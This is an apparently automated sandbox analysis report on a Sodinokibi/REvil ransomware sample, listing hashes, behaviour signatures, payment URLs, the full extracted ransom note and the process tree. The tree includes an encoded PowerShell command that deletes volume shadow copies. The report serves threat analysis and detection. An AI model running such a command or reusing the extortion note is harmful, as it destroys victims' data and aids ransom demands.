Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    21-10-2020 13:13

General

  • Target

    8b2010cc477eb93eb304aed47018b719b7dbac12128a56bc47bd24b6cdbfc983.exe

  • Size

    391KB

  • MD5

    20e978191530341cb70181f4f25a9d4e

  • SHA1

    b9e0ace21669d4284a4f056db05c3d53bb15d8bb

  • SHA256

    8b2010cc477eb93eb304aed47018b719b7dbac12128a56bc47bd24b6cdbfc983

  • SHA512

    24c65f81b2dba62eb6789b149c3bc0b7547d8af1f1c74e9f9ea64309feacd45f25f400cedad050bbab10da0ac510a6bf131472b06332ef24403fefaf964a98fc

Malware Config

Extracted

Path

C:\67k5c9k-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 67k5c9k. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C1267AF4DB4F2CE4 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C1267AF4DB4F2CE4 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: WA2uW4RKSdQSv8CeKuygQ27hZAHq50qgWpqjqhlTXPmZ+T4bAgFu17F3dv9RZ58C 2fOW7I6pMOjLGMfTCMFWuS9z1iDi1RVH87NF+0JtlovSrgDqFRA+g+iILUkp17ZG YyFKj2KPCivS+Rvpxuwk5cNy/k3m6DdWMPmjjgxXQbZskKE834RF1mJYwtKgOTzC UsM06EA1Y1yIFmgDNYWUTGjPYBp05b1Mc9YH3m3d3jCzWR7oAhyn5ADxYAD/q2ij pupPAmJVHegOPTPf1WcoQ4TjthpwL6uW1SCSI0a/AjmwCtVBuSVvhcSJQRQj6YCA VKmt2MUhO65gNxBC+/ZPY+HwPeGHy/KXxjQregfLukkMeDwFVBYP9+h7f3kuRt+i SgbAAlZqoLVPMrgrlSW+arsDutTLIR3eRlOutV0pLlzTCI6GmXxxcQdUdnWNlcXP K1rcFjRfTyrRIM8MS1q3S0Vc+t0rH4VkIiWsf5JeqlxImmZ1tf/9dTvSfXuXLoL2 nXqX8hQROPlsPQDg470pCM0ghSPw92Q3k2Rg1Dpx0TOXzWPJmr1QHK2ueC+C6W0P UYRdhke9+tjnApS82GtjevCUwvNeFHCcGq9mvhcuvax7KD9LRc31ccvY4tO72vTq 0YwWumApCu7rd3hOm103ZmEQyhYCseJkFFH6ubZs7amIQ1vcUggEXdQHZ09yJ/xb g+QLmOkSn7UGJ+R+OJHDRtEZD8h3DqJ3T+88sazuaHypx5FgqWKk7yMHOe3Kqvsd OKfXRqREpVGhPJWaxZPphgsrRoSYiAPhyfdcVmRDFTmSoGeykksTTf/DYf/Zgo7Y KOm/PbdX4xPYPgBkSX1qu2GvJwvH/5mx1rqyvVBuRZJOzdTedhxJ9nJOdQlOl6t7 yZ6CSW62BedW1UUf3Rdu5htvl6FXAREsQYk43hRjpUlXb32SgwPTror6M2B9ELTx SJ8nCoygmyZPg0L1lG+MpwkwMNSVKi3HUZon1Y4gU7fwfEAfpSJmE9itwVwa1IqW +BhOuvzqf1nsKBm0p4hbmAt2rzb0UslnjGcsERJ1+QG5+/YC/MZ9pRceEUO2Ql6X wI7Fgsa2zdoi2O+v2Upn8PtsUglFQNnkFGb3VRNJEDpuICMxqKMHumuQzmqhzI1D lmu2zb1q7hCOnRHVsDkF70uqqV3xHaZ0hhPatS7jrMseO+pNSKdCVqYWxV/+Vz+o yLENvqO3aSA2G+P26CMTzo4zZ6Hnl2TkO9c9o1hiLqZ/fuN0cDk/hw2zt3nUKtCw WR4mtQYZ4THaUyh8R83zETcZ Extension name: 67k5c9k ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C1267AF4DB4F2CE4

http://decryptor.cc/C1267AF4DB4F2CE4

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8b2010cc477eb93eb304aed47018b719b7dbac12128a56bc47bd24b6cdbfc983.exe
    "C:\Users\Admin\AppData\Local\Temp\8b2010cc477eb93eb304aed47018b719b7dbac12128a56bc47bd24b6cdbfc983.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1444
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:2780

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1444-0-0x0000000000000000-mapping.dmp
    • memory/1444-1-0x00007FF88C260000-0x00007FF88CC4C000-memory.dmp
      Filesize

      9.9MB

    • memory/1444-2-0x0000018122D80000-0x0000018122D81000-memory.dmp
      Filesize

      4KB

    • memory/1444-3-0x0000018122F30000-0x0000018122F31000-memory.dmp
      Filesize

      4KB